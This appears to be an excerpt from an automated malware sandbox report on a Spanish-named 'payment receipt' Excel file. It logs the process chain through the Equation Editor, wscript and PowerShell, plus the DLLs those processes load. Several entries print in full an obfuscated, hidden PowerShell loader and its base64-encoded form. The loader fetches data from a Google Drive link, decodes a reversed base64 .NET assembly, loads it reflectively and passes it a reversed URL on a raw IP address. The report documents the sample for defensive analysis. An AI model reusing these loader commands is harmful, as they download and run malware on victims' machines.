    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))"Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Comprobante de pago.xlam.xlsxInitial sample: OLE indicators vbamacros = False

    Data Obfuscation

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))"Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCgoJ3h5cGltYWdlVXJsID0gVFg2aHR0cHM6Ly9kcml2ZS5nb29nbGUuJysnY28nKydtL3VjJysnP2V4cG9ydD1kb3dubG8nKydhZCZpZD0xLVdkZ2VxMGZYOWFBcGRsU1c5ZGxuMVBjX0tFR3BmSHAgVFg2O3h5cHdlYkNsaWVudCA9IE5ldy1PJysnYicrJ2plYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7eHlwaW1hZ2VCeXRlcyA9IHh5cHdlYkNsaWVudC5Eb3dubG9hZERhdGEoeHlwaW1hZ2VVcmwpO3h5cGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC4nKydFbmNvJysnZGluZ106OlVURjguR2V0U3RyaW5nKHh5cGltYWdlQicrJ3l0ZXMpO3h5cHN0YXJ0RmxhZyA9IFRYNjw8JysnQkFTRTY0X1NUQVJUPj5UWCcrJzY7eHlwZW5kRmxhZyA9IFRYNjw8JysnQkFTRTY0X0VORD4+VFg2O3h5cHN0YXJ0SScrJ25kZXggPSB4eXBpbWFnZVRleHQuSW5kZXgnKydPZih4eXBzdGFydEYnKydsYWcpO3gnKyd5cGVuZEluZGV4ID0geHlwaW0nKydhZ2VUZXh0LkluZGV4T2YoeHlwJysnZW5kRmxhZyk7eHlwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHh5cGVuZEluZGV4JysnIC1ndCB4eXBzdGFydEluZGV4O3h5cHN0YXJ0SW5kZXggKz0gJysneHlwc3RhcnRGbGFnLkxlbmd0aDt4eXBiYXNlNjRMZW5ndGggPSB4JysneXBlbmRJbmRleCAtIHh5cHN0YXJ0SW5kZXg7eHlwYmFzZTY0Q29tbWFuZCA9IHh5cGltYWdlJysnVGV4dC5TdWJzdHJpbmcoeHlwc3RhcnRJbmRleCwgeHlwYmFzZTY0TGUnKyduZ3RoKScrJzt4eXBiYXNlNicrJzRSZXZlcnNlZCA9IC1qb2luICh4eXBiYXNlNjRDb21tYW5kLlRvQ2hhckEnKydycmF5KCkgV1ZvIEZvckVhY2gtJysnT2JqZWN0IHsgeHlwXyB9KVstMS4uLSh4eXBiJysnYXNlNjRDb21tYW5kLkxlbmd0aCldO3h5cGNvbW1hbmRCeXRlcycrJyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoeHlwYmFzZTY0UmV2ZXJzZWQpO3h5cGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh4eXBjbycrJ21tYW5kQnl0ZXMpO3h5cHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRobycrJ2QoVFg2VkFJVFg2KTt4eXB2YWlNZXRob2QuSW52b2tlKHh5cG51bGwsIEAoVFg2dHh0JysnLllBRFNFVVQvMjQxLjYxMi4zLjI5MS8vOnB0dGhUWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNmRlc2F0aXZhZG9UWDYsIFRYNkFkZEluUHJvY2VzczMyVFg2LCBUWDZkZXNhdGl2YWRvVFg2LCcrJyBUWDZkZXNhdGl2YWRvVFg2LFRYNicrJ1RYNixUWDZUWDYsVFg2VFg2LFRYNlRYNixUWDZUWDYsVFg2MVRYNikpOycpIC1DckVQbEFDRSAnV1ZvJyxbQ0hBUl0xMjQgIC1DckVQbEFDRSAgKFtDSEFSXTEyMCtbQ0hBUl0xMjErW0NIQVJdMTEyKSxbQ0hBUl0zNiAtQ3JFUGxBQ0UoW0NIQVJdODQrW0NIQVJdODgrW0NIQVJdNTQpLFtDSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex((('xypimageUrl = TX6https://drive.google.'+'co'+'m/uc'+'?export=downlo'+'ad&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp TX6;xypwebClient = New-O'+'b'+'jec'+'t System.Net.WebClient;xypimageBytes = xypwebClient.DownloadData(xypimageUrl);xypimageText = [System.Text.'+'Enco'+'ding]::UTF8.GetString(xypimageB'+'ytes);xypstartFlag = TX6<<'+'BASE64_START>>TX'+'6;xypendFlag = TX6<<'+'BASE64_END>>TX6;xypstartI'+'ndex = xypimageText.Index'+'Of(xypstartF'+'lag);x'+'ypendIndex = xypim'+'ageText.IndexOf(xyp'+'endFlag);xypstartIndex -ge 0 -and xypendIndex'+' -gt xypstartIndex;xypstartIndex += '+'xypstartFlag.Length;xypbase64Length = x'+'ypendIndex - xypstartIndex;xypbase64Command = xypimage'+'Text.Substring(xypstartIndex, xypbase64Le'+'ngth)'+';xypbase6'+'4Reversed = -join (xypbase64Command.ToCharA'+'rray() WVo ForEach-'+'Object { xyp_ })[-1..-(xypb'+'ase64Command.Length)];xypcommandBytes'+' = [System.Convert]::FromBase64String(xypbase64Reversed);xyploadedAssembly = [System.Reflection.Assembly]::Load(xypco'+'mmandBytes);xypvaiMethod = [dnlib.IO.Home].Ge'+'tMetho'+'d(TX6VAITX6);xypvaiMethod.Invoke(xypnull, @(TX6txt'+'.YADSEUT/241.612.3.291//:ptthTX6, TX6desativadoTX6, TX6desativadoTX6, TX6desativadoTX6, TX6AddInProcess32TX6, TX6desativadoTX6,'+' TX6desativadoTX6,TX6'+'TX6,TX6TX6,TX6TX6,TX6TX6,TX6TX6,TX61TX6));') -CrEPlACE 'WVo',[CHAR]124 -CrEPlACE ([CHAR]120+[CHAR]121+[CHAR]112),[CHAR]36 -CrEPlACE([CHAR]84+[CHAR]88+[CHAR]54),[CHAR]39))"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002C21C8 push ebx; iretd 8_2_002C21EA
